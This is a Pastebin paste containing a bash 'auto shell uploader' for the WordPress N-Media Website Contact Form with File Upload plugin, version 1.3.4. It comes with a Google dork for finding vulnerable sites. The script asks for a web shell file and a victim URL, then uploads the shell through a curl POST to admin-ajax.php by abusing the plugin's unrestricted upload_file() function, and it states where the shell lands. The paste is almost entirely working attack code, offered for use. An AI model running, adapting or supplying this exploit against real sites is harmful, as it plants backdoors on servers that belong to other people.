Advertisement
Xyb3r-D3vil

N-Media Script

Jul 24th, 2015
503
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.47 KB | None | 0 0
  1. #!/bin/bash
  2. #
  3. # Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4
  4. # Google Dork : inurl:"/uploads/contact_files/"
  5. # Exploit Author : Claudio Viviani
  6. # Vulnerability discovered by : Claudio Viviani
  7. # Script Written by : F17.c0de
  8. # Software link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
  9. # Version : 1.3.4
  10. # Tested on : Kali Linux 1.1.0a / Curl 7.26.0
  11. # Info: The "upload_file()" ajax function is affected from unrestircted file upload vulnerability
  12. # Response : {"status":"uploaded","filename":"YOURSHELL"}
  13. # Shell location http://VICTIM/wp-content/uploads/contact_files/YOURSHELL
  14.  
  15. echo '
  16. +------+
  17. | |
  18. | Wordpress N-Media Website Contact Form with File Upload 1.3.4 |
  19. | |
  20. +------+
  21. | |
  22. | Script by : F17.c0de |
  23. | Vuln Discovered by : Claudio Viviani |
  24. | Date : 15.04.2015 |
  25. | Google Dork : inurl:"/uploads/contact_files/" |
  26. | Vulnerability : "upload_file()" on admin-ajax.php |
  27. | Description : Auto shell uploader |
  28. | |
  29. +------+
  30. | No System is Safe |
  31. +------+
  32. '
  33.  
  34. echo -n -e "Path of your shell: "
  35. read bd
  36. echo -n -e "Victim address [ex: http://www.victim.com]: "
  37. read st
  38. sleep 1
  39. echo
  40. echo "Uploading Shell. . ."
  41. echo
  42.  
  43. curl -k -X POST -F "action=upload" -F "Filedata=@./$bd" -F "action=nm_webcontact_upload_file" $st/wp-admin/admin-ajax.php
  44.  
  45. echo
  46. echo
  47. echo "Job Finished"
  48. echo
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement